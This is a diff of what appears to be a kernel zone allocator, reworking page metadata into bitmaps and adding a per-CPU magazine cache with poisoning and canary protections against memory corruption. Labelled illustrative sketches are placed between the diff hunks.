+#define ZALLOC_ENABLE_POISONING 1
 #define ZONE_ENABLE_LOGGING 1
 #else
+#define ZALLOC_ENABLE_POISONING 1
 #define ZONE_ENABLE_LOGGING 0
 #endif
 
+#if __LP64__
+#define ZALLOC_EARLY_GAPS 1
+#else
+#define ZALLOC_EARLY_GAPS 0
+#endif
+
+#if DEBUG
+#define z_debug_assert(expr)  assert(expr)
+#else
+#define z_debug_assert(expr)  (void)(expr)
+#endif
+
 extern void vm_pageout_garbage_collect(int collect);
 
 /* Returns pid of the task with the largest number of VM map entries.  */
@@ -131,120 +152,277 @@ extern boolean_t memorystatus_kill_on_zone_map_exhaustion(pid_t pid);
 
 extern zone_t vm_map_entry_zone;
 extern zone_t vm_object_zone;
-extern vm_offset_t kmapoff_kaddr;
-extern unsigned int kmapoff_pgcnt;
-extern unsigned int stack_total;
-extern unsigned long long stack_allocs;
-
-/*
- * The max # of elements in a chunk should fit into
- * zone_page_metadata.free_count (uint16_t).
- *
- * Update this if the type of free_count changes.
- */
-#define ZONE_CHUNK_MAXELEMENTS  (UINT16_MAX)
-
-#define ZONE_PAGECOUNT_BITS     14
 
-/* Zone elements must fit both a next pointer and a backup pointer */
-#define ZONE_MIN_ELEM_SIZE      (2 * sizeof(vm_offset_t))
+#define ZONE_MIN_ELEM_SIZE      sizeof(uint64_t)
 #define ZONE_MAX_ALLOC_SIZE     (32 * 1024)
 
-/* per-cpu zones are special because of counters */
-#define ZONE_MIN_PCPU_ELEM_SIZE (1 * sizeof(vm_offset_t))
-
-struct zone_map_range {
-       vm_offset_t min_address;
-       vm_offset_t max_address;
-};
-
 struct zone_page_metadata {
        /* The index of the zone this metadata page belongs to */
-       zone_id_t       zm_index;
-
-       /*
-        * zm_secondary_page == 0: number of pages in this run
-        * zm_secondary_page == 1: offset to the chunk start
-        */
-       uint16_t        zm_page_count : ZONE_PAGECOUNT_BITS;
+       zone_id_t       zm_index : 11;
 
-       /* Whether this page is part of a chunk run */
-       uint16_t        zm_percpu : 1;
-       uint16_t        zm_secondary_page : 1;
+       /* Whether `zm_bitmap` is an inline bitmap or a packed bitmap reference */
+       uint16_t        zm_inline_bitmap : 1;
 
        /*
-        * The start of the freelist can be maintained as a 16-bit
-        * offset instead of a pointer because the free elements would
-        * be at max ZONE_MAX_ALLOC_SIZE bytes away from the start
-        * of the allocation chunk.
+        * Zones allocate in "chunks" of zone_t::z_chunk_pages consecutive
+        * pages, or zpercpu_count() pages if the zone is percpu.
         *
-        * Offset from start of the allocation chunk to free element
-        * list head.
-        */
-       uint16_t        zm_freelist_offs;
-
-       /*
-        * zm_secondary_page == 0: number of allocated elements in the chunk
-        * zm_secondary_page == 1: unused
+        * The first page of it has its metadata set with:
+        * - 0 if none of the pages are currently wired
+        * - the number of wired pages in the chunk (not scaled for percpu).
         *
-        * PAGE_METADATA_EMPTY_FREELIST indicates an empty freelist
+        * Other pages in the chunk have their zm_chunk_len set to
+        * ZM_SECONDARY_PAGE or ZM_SECONDARY_PCPU_PAGE depending on whether
+        * the zone is percpu or not. For those, zm_page_index holds the
+        * index of that page in the run.
         */
-       uint16_t        zm_alloc_count;
-#define PAGE_METADATA_EMPTY_FREELIST  UINT16_MAX
+       uint16_t        zm_chunk_len : 4;
+#define ZM_CHUNK_LEN_MAX        0x8
+#define ZM_SECONDARY_PAGE       0xe
+#define ZM_SECONDARY_PCPU_PAGE  0xf
+
+       union {
+#define ZM_ALLOC_SIZE_LOCK      1u
+               uint16_t zm_alloc_size; /* first page only */
+               uint16_t zm_page_index; /* secondary pages only */
+       };
+       union {
+               uint32_t zm_bitmap;     /* most zones */
+               uint32_t zm_bump;       /* permanent zones */
+       };
 
        zone_pva_t      zm_page_next;
        zone_pva_t      zm_page_prev;
-
-       /*
-        * This is only for the sake of debuggers
-        */
-#define ZONE_FOREIGN_COOKIE           0x123456789abcdef
-       uint64_t        zm_foreign_cookie[];
 };
+static_assert(sizeof(struct zone_page_metadata) == 16, "validate packing");
 
+__enum_closed_decl(zone_addr_kind_t, bool, {
+       ZONE_ADDR_FOREIGN,
+       ZONE_ADDR_NATIVE,
+});
+#define ZONE_ADDR_KIND_COUNT 2
 
-/* Align elements that use the zone page list to 32 byte boundaries. */
-#define ZONE_PAGE_FIRST_OFFSET(kind)  ((kind) == ZONE_ADDR_NATIVE ? 0 : 32)
+/*!
+ * @typedef zone_element_t
+ *
+ * @brief
+ * Type that represents a "resolved" zone element.
+ *
+ * @description
+ * This type encodes an element pointer as a tuple of:
+ * { chunk base, element index, element protection }.
+ *
+ * The chunk base is extracted with @c trunc_page()
+ * as it is always page aligned, and occupies the bits above @c PAGE_SHIFT.
+ *
+ * The low two bits encode the protection mode (see @c zprot_mode_t).
+ *
+ * The other bits encode the element index in the chunk rather than its address.
+ */
+typedef struct zone_element {
+       vm_offset_t                 ze_value;
+} zone_element_t;
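As a worked illustration of that encoding (arbitrary values; ZPM_ZERO is 1 per
the zprot_mode_t enum further down, and the packing matches
zone_element_encode() below):

/*
 * chunk base 0x1234000 (page aligned), element index 5, protection ZPM_ZERO:
 *     ze_value = 0x1234000 | (5 << 2) | 1 = 0x1234015
 * trunc_page(0x1234015) recovers the base, (0x15 >> 2) the index,
 * and (0x15 & 0x3) the protection mode.
 */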
 
-static_assert(sizeof(struct zone_page_metadata) == 16, "validate packing");
+/*!
+ * @typedef zone_magazine_t
+ *
+ * @brief
+ * Magazine of cached allocations.
+ *
+ * @field zm_cur        how many elements this magazine holds (unused while loaded).
+ * @field zm_link       linkage used by magazine depots.
+ * @field zm_elems      an array of @c zc_mag_size() elements.
+ */
+typedef struct zone_magazine {
+       uint16_t                    zm_cur;
+       STAILQ_ENTRY(zone_magazine) zm_link;
+       zone_element_t              zm_elems[0];
+} *zone_magazine_t;
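A short sketch of how a magazine is filled and drained (hypothetical helpers;
the mag_size parameter stands in for zc_mag_size(), and the real load/unload
paths live in the cached zalloc/zfree code):

static bool
zone_magazine_push_sketch(zone_magazine_t mag, zone_element_t ze,
    uint16_t mag_size)
{
	if (mag->zm_cur >= mag_size) {
		return false;           /* magazine is full */
	}
	mag->zm_elems[mag->zm_cur++] = ze;
	return true;
}

static bool
zone_magazine_pop_sketch(zone_magazine_t mag, zone_element_t *ze)
{
	if (mag->zm_cur == 0) {
		return false;           /* magazine is empty */
	}
	*ze = mag->zm_elems[--mag->zm_cur];
	return true;
}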
+
+/*!
+ * @typedef zone_cache_t
+ *
+ * @brief
+ * Per-CPU cache of zone allocations.
+ *
+ * @discussion
+ * Below is a diagram of the caching system. This design is inspired by the
+ * paper "Magazines and Vmem: Extending the Slab Allocator to Many CPUs and
+ * Arbitrary Resources" by Jeff Bonwick and Jonathan Adams and the FreeBSD UMA
+ * zone allocator (itself derived from this seminal work).
+ *
+ * It is divided into 3 layers:
+ * - the per-cpu layer,
+ * - the recirculation depot layer,
+ * - the Zone Allocator.
+ *
+ * The per-cpu and recirculation depot layer use magazines (@c zone_magazine_t),
+ * which are stacks of up to @c zc_mag_size() elements.
+ *
+ * <h2>CPU layer</h2>
+ *
+ * The CPU layer (@c zone_cache_t) looks like this:
+ *
+ *      ╭─ a ─ f ─┬───────── zc_depot ──────────╮
+ *      │ ╭─╮ ╭─╮ │ ╭─╮ ╭─╮ ╭─╮ ╭─╮ ╭─╮         │
+ *      │ │#│ │#│ │ │#│ │#│ │#│ │#│ │#│         │
+ *      │ │#│ │ │ │ │#│ │#│ │#│ │#│ │#│         │
+ *      │ │ │ │ │ │ │#│ │#│ │#│ │#│ │#│         │
+ *      │ ╰─╯ ╰─╯ │ ╰─╯ ╰─╯ ╰─╯ ╰─╯ ╰─╯         │
+ *      ╰─────────┴──────────────────────────────╯
+ *
+ * It has two pre-loaded magazines (a)lloc and (f)ree which we allocate from,
+ * or free to. Serialization is achieved through disabling preemption, and only
+ * the current CPU can access those allocations. This is represented on the left
+ * hand side of the diagram above.
+ *
+ * The right hand side is the per-cpu depot. It consists of @c zc_depot_cur
+ * full magazines, and is protected by the @c zc_depot_lock.
+ * The lock is expected to virtually never be contended, as only the local CPU
+ * tends to access its own per-cpu depot in regular operation mode.
+ *
+ * However unlike UMA, our implementation allows for the zone GC to reclaim
+ * per-CPU magazines aggressively, which is serialized with the @c zc_depot_lock.
+ *
+ *
+ * <h2>Recirculation Depot</h2>
+ *
+ * The recirculation depot layer is a list similar to the per-cpu depot,
+ * however it is different in two fundamental ways:
+ *
+ * - it is protected by the regular zone lock,
+ * - elements referenced by the magazines in that layer appear free
+ *   to the zone layer.
+ *
+ *
+ * <h2>Magazine circulation and sizing</h2>
+ *
+ * The caching system sizes itself dynamically. Operations that allocate/free
+ * a single element call @c zone_lock_nopreempt_check_contention() which records
+ * contention on the lock by doing a trylock and recording its success.
+ *
+ * This information is stored in the @c z_contention_cur field of the zone,
+ * and a windowed moving average is maintained in @c z_contention_wma.
+ * Each time a CPU registers any contention, it will also allow its own per-cpu
+ * cache to grow, incrementing @c zc_depot_max, which is how the per-cpu layer
+ * might grow into using its local depot.
+ *
+ * Note that @c zc_depot_max assumes that the (a) and (f) pre-loaded magazines
+ * on average contain @c zc_mag_size() elements.
+ *
+ * When a per-cpu layer cannot hold more full magazines in its depot,
+ * it will overflow about 1/3 of its depot into the recirculation depot
+ * (see @c zfree_cached_slow()). Conversely, when a depot is empty, it will
+ * refill its per-cpu depot to about 1/3 of its size from the recirculation
+ * depot (see @c zalloc_cached_slow()).
+ *
+ * Lastly, the zone layer keeps track of the high and low watermarks of how many
+ * elements have been free over a period of time (including those sitting in the
+ * recirculation depot) in the @c z_elems_free_min and @c z_elems_free_max
+ * fields. A weighted moving average of the amplitude of this is maintained in
+ * @c z_elems_free_wss, which informs the zone GC on how to gently trim
+ * zones without hurting performance.
+ *
+ *
+ * <h2>Security considerations</h2>
+ *
+ * The zone caching layer has been designed to avoid returning elements in
+ * strict LIFO order: @c zalloc() will allocate from the (a) magazine,
+ * and @c zfree() free to the (f) magazine, and only swap them when the
+ * requested operation cannot be fulfilled.
+ *
+ * The per-cpu overflow depot or the recirculation depots are similarly used
+ * in FIFO order.
+ *
+ * More importantly, when magazines flow through the recirculation depot,
+ * the elements they contain are marked as "free" in the zone layer bitmaps.
+ * Because allocations out of per-cpu caches verify the bitmaps at allocation
+ * time, this acts as a poor man's double-free quarantine. The magazines
+ * allow to avoid the cost of the bit-scanning involved in the zone-level
+ * @c zalloc_item() codepath.
+ *
+ *
+ * @field zc_alloc_cur      denormalized number of elements in the (a) magazine
+ * @field zc_free_cur       denormalized number of elements in the (f) magazine
+ * @field zc_alloc_elems    a pointer to the array of elements in (a)
+ * @field zc_free_elems     a pointer to the array of elements in (f)
+ *
+ * @field zc_depot_lock     a lock to access @c zc_depot, @c zc_depot_cur.
+ * @field zc_depot          a list of @c zc_depot_cur full magazines
+ * @field zc_depot_cur      number of magazines in @c zc_depot
+ * @field zc_depot_max      the maximum number of elements in @c zc_depot,
+ *                          protected by the zone lock.
+ */
+typedef struct zone_cache {
+       uint16_t                   zc_alloc_cur;
+       uint16_t                   zc_free_cur;
+       uint16_t                   zc_depot_cur;
+       uint16_t                   __zc_padding;
+       zone_element_t            *zc_alloc_elems;
+       zone_element_t            *zc_free_elems;
+       hw_lock_bit_t              zc_depot_lock;
+       uint32_t                   zc_depot_max;
+       struct zone_depot          zc_depot;
+} *zone_cache_t;
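A simplified sketch of the per-CPU fast path described above (hypothetical
helper; the real code also deals with the per-cpu depot, the recirculation
depot and statistics, and assumes preemption is already disabled):

static bool
zone_cache_alloc_fast_sketch(zone_cache_t cache, zone_element_t *ze)
{
	if (cache->zc_alloc_cur == 0) {
		if (cache->zc_free_cur == 0) {
			return false;   /* fall back to depot / zone slow path */
		}
		/* swap the roles of the (a) and (f) magazines */
		zone_element_t *elems = cache->zc_alloc_elems;
		uint16_t        cur   = cache->zc_alloc_cur;

		cache->zc_alloc_elems = cache->zc_free_elems;
		cache->zc_alloc_cur   = cache->zc_free_cur;
		cache->zc_free_elems  = elems;
		cache->zc_free_cur    = cur;
	}
	*ze = cache->zc_alloc_elems[--cache->zc_alloc_cur];
	return true;
}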
 
 static __security_const_late struct {
-       struct zone_map_range      zi_map_range;
-       struct zone_map_range      zi_general_range;
-       struct zone_map_range      zi_meta_range;
-       struct zone_map_range      zi_foreign_range;
+       struct zone_map_range      zi_map_range[ZONE_ADDR_KIND_COUNT];
+       struct zone_map_range      zi_meta_range; /* debugging only */
+       struct zone_map_range      zi_bits_range; /* bits buddy allocator */
 
        /*
         * The metadata lives within the zi_meta_range address range.
         *
         * The correct formula to find a metadata index is:
-        *     absolute_page_index - page_index(zi_meta_range.min_address)
+        *     absolute_page_index - page_index(MIN(zi_map_range[*].min_address))
         *
         * And then this index is used to dereference zi_meta_range.min_address
         * as a `struct zone_page_metadata` array.
         *
         * To avoid doing that subtraction all the time in the various fast-paths,
-        * zi_array_base is offset by `page_index(zi_meta_range.min_address)`
-        * to avoid redoing that math all the time.
+        * zi_meta_base is pre-offset with that minimum page index to avoid redoing
+        * that math all the time.
+        *
+        * Do note that the array might have a hole punched in the middle,
+        * see zone_metadata_init().
         */
-       struct zone_page_metadata *zi_array_base;
+       struct zone_page_metadata *zi_meta_base;
 } zone_info;
 
+/*
+ * Initial array of metadata for stolen memory.
+ *
+ * The numbers here have to be kept in sync with vm_map_steal_memory()
+ * so that we have reserved enough metadata.
+ *
+ * After zone_init() has run (which happens while the kernel is still single
+ * threaded), the metadata is moved to its final dynamic location, and
+ * this array is unmapped with the rest of __startup_data at lockdown.
+ */
+#if CONFIG_GZALLOC
+#define ZONE_FOREIGN_META_INLINE_COUNT    20032
+#else
+#define ZONE_FOREIGN_META_INLINE_COUNT    64
+#endif
+__startup_data
+static struct zone_page_metadata
+    zone_foreign_meta_array_startup[ZONE_FOREIGN_META_INLINE_COUNT];
+
 /*
  *     The zone_locks_grp allows for collecting lock statistics.
  *     All locks are associated to this group in zinit.
  *     Look at tools/lockstat for debugging lock contention.
  */
-LCK_GRP_DECLARE(zone_locks_grp, "zone_locks");
-LCK_MTX_EARLY_DECLARE(zone_metadata_region_lck, &zone_locks_grp);
+static LCK_GRP_DECLARE(zone_locks_grp, "zone_locks");
+static LCK_MTX_EARLY_DECLARE(zone_metadata_region_lck, &zone_locks_grp);
 
 /*
  *     Exclude more than one concurrent garbage collection
  */
-LCK_GRP_DECLARE(zone_gc_lck_grp, "zone_gc");
-LCK_MTX_EARLY_DECLARE(zone_gc_lock, &zone_gc_lck_grp);
+static LCK_GRP_DECLARE(zone_gc_lck_grp, "zone_gc");
+static LCK_MTX_EARLY_DECLARE(zone_gc_lock, &zone_gc_lck_grp);
 
-boolean_t panic_include_zprint = FALSE;
+bool panic_include_zprint = FALSE;
 mach_memory_info_t *panic_kext_memory_info = NULL;
 vm_size_t panic_kext_memory_size = 0;
 
@@ -253,8 +431,8 @@ vm_size_t panic_kext_memory_size = 0;
  *      zone_destroyed_bitmap
  */
 static SIMPLE_LOCK_DECLARE(all_zones_lock, 0);
-static unsigned int     num_zones_in_use;
-unsigned int _Atomic    num_zones;
+static zone_id_t        num_zones_in_use;
+zone_id_t _Atomic       num_zones;
 SECURITY_READ_ONLY_LATE(unsigned int) zone_view_count;
 
 #if KASAN_ZALLOC
@@ -262,7 +440,28 @@ SECURITY_READ_ONLY_LATE(unsigned int) zone_view_count;
 #else /* !KASAN_ZALLOC */
 #define MAX_ZONES       402
 #endif/* !KASAN_ZALLOC */
-struct zone             zone_array[MAX_ZONES];
+
+/*
+ * Initial globals for zone stats until we can allocate the real ones.
+ * Those get migrated into the per-CPU ones during zone_init() and
+ * this array is unmapped with the rest of __startup_data at lockdown.
+ */
+
+/* zone to allocate zone_magazine structs from */
+static SECURITY_READ_ONLY_LATE(zone_t) zc_magazine_zone;
+/*
+ * Until pid1 is made, zone caching is off, that is, until
+ * compute_zone_working_set_size() runs for the first time.
+ *
+ * -1 represents the "never enabled yet" value.
+ */
+static int8_t zone_caching_disabled = -1;
+
+__startup_data
+static struct zone_cache zone_cache_startup[MAX_ZONES];
+__startup_data
+static struct zone_stats zone_stats_startup[MAX_ZONES];
+struct zone              zone_array[MAX_ZONES];
 
 /* Initialized in zone_bootstrap(), how many "copies" the per-cpu system does */
 static SECURITY_READ_ONLY_LATE(unsigned) zpercpu_early_count;
@@ -270,9 +469,6 @@ static SECURITY_READ_ONLY_LATE(unsigned) zpercpu_early_count;
 /* Used to keep track of destroyed slots in the zone_array */
 static bitmap_t zone_destroyed_bitmap[BITMAP_LEN(MAX_ZONES)];
 
-/* number of pages used by all zones */
-static long _Atomic zones_phys_page_count;
-
 /* number of zone mapped pages used by all zones */
 static long _Atomic zones_phys_page_mapped_count;
 
@@ -298,70 +494,56 @@ TUNABLE(zone_security_options_t, zsecurity_options, "zs", ZSECURITY_DEFAULT);
 
 #if VM_MAX_TAG_ZONES
 /* enable tags for zones that ask for it */
-TUNABLE(bool, zone_tagging_on, "-zt", false);
+static TUNABLE(bool, zone_tagging_on, "-zt", false);
 #endif /* VM_MAX_TAG_ZONES */
 
 #if DEBUG || DEVELOPMENT
 TUNABLE(bool, zalloc_disable_copyio_check, "-no-copyio-zalloc-check", false);
-__options_decl(zalloc_debug_t, uint32_t, {
-       ZALLOC_DEBUG_ZONEGC     = 0x00000001,
-       ZALLOC_DEBUG_ZCRAM      = 0x00000002,
-});
-
-TUNABLE(zalloc_debug_t, zalloc_debug, "zalloc_debug", 0);
 #endif /* DEBUG || DEVELOPMENT */
 #if CONFIG_ZLEAKS
 /* Making pointer scanning leaks detection possible for all zones */
-TUNABLE(bool, zone_leaks_scan_enable, "-zl", false);
+static TUNABLE(bool, zone_leaks_scan_enable, "-zl", false);
 #else
 #define zone_leaks_scan_enable false
 #endif
 
-/*
- * Async allocation of zones
- * This mechanism allows for bootstrapping an empty zone which is setup with
- * non-blocking flags. The first call to zalloc_noblock() will kick off a thread_call
- * to zalloc_async. We perform a zalloc() (which may block) and then an immediate free.
- * This will prime the zone for the next use.
- *
- * Currently the thread_callout function (zalloc_async) will loop through all zones
- * looking for any zone with async_pending set and do the work for it.
+/*! @enum zprot_mode_t
  *
- * NOTE: If the calling thread for zalloc_noblock is lower priority than thread_call,
- * then zalloc_noblock to an empty zone may succeed.
- */
-static void zalloc_async(thread_call_param_t p0, thread_call_param_t p1);
-static thread_call_data_t call_async_alloc;
-static void zcram_and_lock(zone_t zone, vm_offset_t newmem, vm_size_t size);
-
-/*
- * Zone Corruption Debugging
+ * @brief
+ * Zone element corruption detection mode.
  *
+ * @discussion
  * We use four techniques to detect modification of a zone element
  * after it's been freed.
  *
- * (1) Check the freelist next pointer for sanity.
- * (2) Store a backup of the next pointer at the end of the element,
- *     and compare it to the primary next pointer when the element is allocated
- *     to detect corruption of the freelist due to use-after-free bugs.
- *     The backup pointer is also XORed with a per-boot random cookie.
- * (3) Poison the freed element by overwriting it with 0xdeadbeef,
- *     and check for that value when the element is being reused to make sure
- *     no part of the element has been modified while it was on the freelist.
- *     This will also help catch read-after-frees, as code will now dereference
- *     0xdeadbeef instead of a valid but freed pointer.
- * (4) If the zfree_clear_mem flag is set clear the element on free and
- *     assert that it is still clear when alloc-ed.
- *
- * (1) and (2) occur for every allocation and free to a zone.
- * This is done to make it slightly more difficult for an attacker to
- * manipulate the freelist to behave in a specific way.
- *
- * Poisoning (3) occurs periodically for every N frees (counted per-zone).
+ * Elements that are in zones can be in 3 possible states:
+ * - zeroed out (@c ZPM_ZERO)
+ * - poisoned (@c ZPM_POISON) with the @c ZONE_POISON pattern
+ * - with a left and right canary (@c ZPM_CANARY).
+ *
+ * @c ZPM_AUTO is used when the actual protection for the element is unknown,
+ * and will be detected by looking at the last word of the allocation at validation
+ * time.
+ *
+ * The mode of an element in zones is discovered by looking at its last
+ * pointer-sized value:
+ * - 0 means that it is zeroed out
+ * - @c ZONE_POISON means it is poisoned
+ * - any other value means it is using canaries.
+ *
+ * Elements are zeroed if:
+ * - the element size is smaller than @c zp_min_size,
+ * - the owning zone has the @c z_free_zeroes flag set,
+ * - the chunk backing store is fresh (and was just allocated).
+ *
+ * Elements are poisoned periodically for every N frees (counted per-zone),
+ * if the elements aren't otherwise zeroed out.
  * If -zp is passed as a boot arg, poisoning occurs for every free.
  *
- * Zeroing (4) is done for those zones that pass the ZC_ZFREE_CLEARMEM
- * flag on creation or if the element size is less than one cacheline.
+ * Otherwise, elements use canaries. When canaries are used, the first and last
+ * pointer-sized values in the allocation are set to values derived from the
+ * element address and the @c zp_canary nonce. The first @c zp_min_size
+ * bytes of the element are also cleared.
  *
  * Performance slowdown is inversely proportional to the frequency of poisoning,
  * with a 4-5% hit around N=1, down to ~0.3% at N=16 and just "noise" at N=32
@@ -372,23 +554,15 @@ static void zcram_and_lock(zone_t zone, vm_offset_t newmem, vm_size_t size);
  *
  * For a more heavyweight, but finer-grained method of detecting misuse
  * of zone memory, look up the "Guard mode" zone allocator in gzalloc.c.
- *
- * Zone Corruption Logging
- *
- * You can also track where corruptions come from by using the boot-arguments
- * "zlog=<zone name to log> -zc". Search for "Zone corruption logging" later
- * in this document for more implementation and usage information.
- *
- * Zone Leak Detection
- *
- * To debug leaks of zone memory, use the zone leak detection tool 'zleaks'
- * found later in this file via the showtopztrace and showz* macros in kgmacros,
- * or use zlog without the -zc argument.
- *
  */
+__enum_closed_decl(zprot_mode_t, vm_offset_t, {
+       ZPM_AUTO,       /* element is indeterminate          */
+       ZPM_ZERO,       /* element is zeroed                 */
+       ZPM_POISON,     /* element is poisoned               */
+       ZPM_CANARY,     /* element extremities have a canary */
+});
+#define ZPM_MASK ((zprot_mode_t)0x3)
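A sketch of how a ZPM_AUTO element can be classified by its last pointer-sized
word, per the rules above (hypothetical helper; ZONE_POISON is the existing
poison pattern referenced in the discussion):

static zprot_mode_t
zone_element_detect_prot_sketch(vm_offset_t elem, vm_size_t esize)
{
	vm_offset_t last = *(vm_offset_t *)(elem + esize - sizeof(vm_offset_t));

	if (last == 0) {
		return ZPM_ZERO;
	}
	if (last == ZONE_POISON) {
		return ZPM_POISON;
	}
	return ZPM_CANARY;
}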
 
-#define ZP_DEFAULT_SAMPLING_FACTOR 16
-#define ZP_DEFAULT_SCALE_FACTOR 4
 
 /*
  * set by zp-factor=N boot arg
@@ -399,57 +573,63 @@ static void zcram_and_lock(zone_t zone, vm_offset_t newmem, vm_size_t size);
  * A zp_factor of 1 indicates zone poisoning is on for all elements and can be
  * set by passing the -zp boot-arg.
  */
-static TUNABLE(uint32_t, zp_factor, "zp-factor", ZP_DEFAULT_SAMPLING_FACTOR);
+static TUNABLE(uint32_t, zp_factor, "zp-factor", 16);
 
 /* set by zp-scale=N boot arg, scales zp_factor by zone size */
-static TUNABLE(uint32_t, zp_scale, "zp-scale", ZP_DEFAULT_SCALE_FACTOR);
-
-/* initialized to a per-boot random value in zp_bootstrap */
-static SECURITY_READ_ONLY_LATE(uintptr_t) zp_poisoned_cookie;
-static SECURITY_READ_ONLY_LATE(uintptr_t) zp_nopoison_cookie;
-static SECURITY_READ_ONLY_LATE(uintptr_t) zp_min_size;
-static SECURITY_READ_ONLY_LATE(uint64_t) zone_phys_mapped_max;
-
-static SECURITY_READ_ONLY_LATE(vm_map_t) zone_submaps[Z_SUBMAP_IDX_COUNT];
-static SECURITY_READ_ONLY_LATE(uint32_t) zone_last_submap_idx;
+static TUNABLE(uint32_t, zp_scale, "zp-scale", 4);
 
-static struct bool_gen zone_bool_gen;
-static zone_t          zone_find_largest(void);
-static void            zone_drop_free_elements(zone_t z);
-
-#define submap_for_zone(z) zone_submaps[(z)->submap_idx]
-#define MAX_SUBMAP_NAME                16
-
-/* Globals for random boolean generator for elements in free list */
-#define MAX_ENTROPY_PER_ZCRAM           4
-
-#if CONFIG_ZCACHE
 /*
- * Specifies a single zone to enable CPU caching for.
- * Can be set using boot-args: zcc_enable_for_zone_name=<zone>
+ * Zone caching tunables
+ *
+ * zc_mag_size():
+ *   size of magazines, larger to reduce contention at the expense of memory
+ *
+ * zc_auto_enable_threshold
+ *   number of contentions per second after which zone caching engages
+ *   automatically.
+ *
+ *   0 to disable.
+ *
+ * zc_grow_threshold
+ *   number of contentions per second after which the per-cpu depot layer
+ *   grows at each newly observed contention without restriction.
+ *
+ *   0 to disable.
+ *
+ * zc_recirc_denom
+ *   denominator of the fraction of per-cpu depot to migrate to/from
+ *   the recirculation depot layer at a time. Default 3 (1/3).
+ *
+ * zc_defrag_ratio
+ *   percentage of the working set to recirc size below which
+ *   the zone is defragmented. Default is 50%.
+ *
+ * zc_free_batch_size
+ *   The size of batches of frees/reclaim that can be done keeping
+ *   the zone lock held (and preemption disabled).
+ */
+static TUNABLE(uint16_t, zc_magazine_size, "zc_mag_size", 8);
+static TUNABLE(uint32_t, zc_auto_threshold, "zc_auto_enable_threshold", 20);
+static TUNABLE(uint32_t, zc_grow_threshold, "zc_grow_threshold", 8);
+static TUNABLE(uint32_t, zc_recirc_denom, "zc_recirc_denom", 3);
+static TUNABLE(uint32_t, zc_defrag_ratio, "zc_defrag_ratio", 50);
+static TUNABLE(uint32_t, zc_free_batch_size, "zc_free_batch_size", 1024);
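For instance, with the defaults above, the number of magazines moved between a
per-cpu depot and the recirculation depot in one go could be computed as in
this sketch (hypothetical helper, using zc_recirc_denom as described):

static uint32_t
zone_recirc_batch_sketch(uint32_t depot_cur)
{
	uint32_t n = depot_cur / zc_recirc_denom;

	/* with zc_recirc_denom == 3, 9 full magazines overflow 3 at a time */
	return n > 0 ? n : 1;
}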
+
+static SECURITY_READ_ONLY_LATE(uintptr_t) zp_canary;
+/*
+ * Perf results for zeroing all non-data zones and 2K of data zones
+ * showed little regression, therefore zp_min_size defaults to 2048
  */
-static char cache_zone_name[MAX_ZONE_NAME];
-static TUNABLE(bool, zcc_kalloc, "zcc_kalloc", false);
+static TUNABLE(uint32_t, zp_min_size, "zclear_size", 2048);
+static SECURITY_READ_ONLY_LATE(uint32_t)  zone_phys_mapped_max_pages;
+static SECURITY_READ_ONLY_LATE(vm_map_t)  zone_submaps[Z_SUBMAP_IDX_COUNT];
+static SECURITY_READ_ONLY_LATE(uint32_t)  zone_last_submap_idx;
 
-__header_always_inline bool
-zone_caching_enabled(zone_t z)
-{
-       return z->zcache.zcc_depot != NULL;
-}
-#else
-__header_always_inline bool
-zone_caching_enabled(zone_t z __unused)
-{
-       return false;
-}
-#endif /* CONFIG_ZCACHE */
+static zone_t zone_find_largest(void);
 
+#endif /* !ZALLOC_TEST */
 #pragma mark Zone metadata
-
-__enum_closed_decl(zone_addr_kind_t, bool, {
-       ZONE_ADDR_NATIVE,
-       ZONE_ADDR_FOREIGN,
-});
+#if !ZALLOC_TEST
 
 static inline zone_id_t
 zone_index(zone_t z)
@@ -463,18 +643,36 @@ zone_has_index(zone_t z, zone_id_t zid)
        return zone_array + zid == z;
 }
 
-static inline vm_size_t
-zone_elem_count(zone_t zone, vm_size_t alloc_size, zone_addr_kind_t kind)
+static zone_element_t
+zone_element_encode(vm_offset_t base, vm_offset_t eidx, zprot_mode_t zpm)
 {
-       if (kind == ZONE_ADDR_NATIVE) {
-               if (zone->percpu) {
-                       return PAGE_SIZE / zone_elem_size(zone);
-               }
-               return alloc_size / zone_elem_size(zone);
-       } else {
-               assert(alloc_size == PAGE_SIZE);
-               return (PAGE_SIZE - ZONE_PAGE_FIRST_OFFSET(kind)) / zone_elem_size(zone);
-       }
+       return (zone_element_t){ .ze_value = base | (eidx << 2) | zpm };
+}
+
+static vm_offset_t
+zone_element_base(zone_element_t ze)
+{
+       return trunc_page(ze.ze_value);
+}
+
+static vm_offset_t
+zone_element_idx(zone_element_t ze)
+{
+       return (ze.ze_value & PAGE_MASK) >> 2;
+}
+
+#if ZALLOC_ENABLE_POISONING
+static zprot_mode_t
+zone_element_prot(zone_element_t ze)
+{
+       return (zprot_mode_t)(ze.ze_value & ZPM_MASK);
+}
+#endif
+
+static vm_offset_t
+zone_element_addr(zone_element_t ze, vm_offset_t esize)
+{
+       return zone_element_base(ze) + esize * zone_element_idx(ze);
 }
 
 __abortlike
@@ -494,6 +692,15 @@ zone_invalid_element_addr_panic(zone_t zone, vm_offset_t addr)
            (void *)addr, zone_heap_name(zone), zone->z_name);
 }
 
+__abortlike
+static void
+zone_invalid_element_panic(zone_t zone, zone_element_t ze)
+{
+       panic("zone element pointer validation failed (elem: %p,%d, zone %s%s)",
+           (void *)zone_element_base(ze), (int)zone_element_idx(ze),
+           zone_heap_name(zone), zone->z_name);
+}
+
 __abortlike
 static void
 zone_page_metadata_index_confusion_panic(zone_t zone, vm_offset_t addr,
@@ -521,22 +728,6 @@ zone_page_metadata_list_corruption(zone_t zone, struct zone_page_metadata *meta)
            meta, zone_heap_name(zone), zone->z_name);
 }
 
-__abortlike
-static void
-zone_page_metadata_foreign_queue_corruption(zone_t zone, zone_pva_t *queue)
-{
-       panic("native metadata index %d enqueued in foreign head %p from zone %s%s",
-           queue->packed_address, queue, zone_heap_name(zone), zone->z_name);
-}
-
-__abortlike
-static void
-zone_page_metadata_foreign_confusion_panic(zone_t zone, vm_offset_t addr)
-{
-       panic("manipulating foreign address %p in a native-only zone %s%s",
-           (void *)addr, zone_heap_name(zone), zone->z_name);
-}
-
 __abortlike __unused
 static void
 zone_invalid_foreign_addr_panic(zone_t zone, vm_offset_t addr)
@@ -554,6 +745,15 @@ zone_page_meta_accounting_panic(zone_t zone, struct zone_page_metadata *meta,
            zone_heap_name(zone), zone->z_name, meta);
 }
 
+__abortlike
+static void
+zone_meta_double_free_panic(zone_t zone, zone_element_t ze, const char *caller)
+{
+       panic("%s: double free of %p to zone %s%s", caller,
+           (void *)zone_element_addr(ze, zone_elem_size(zone)),
+           zone_heap_name(zone), zone->z_name);
+}
+
 __abortlike
 static void
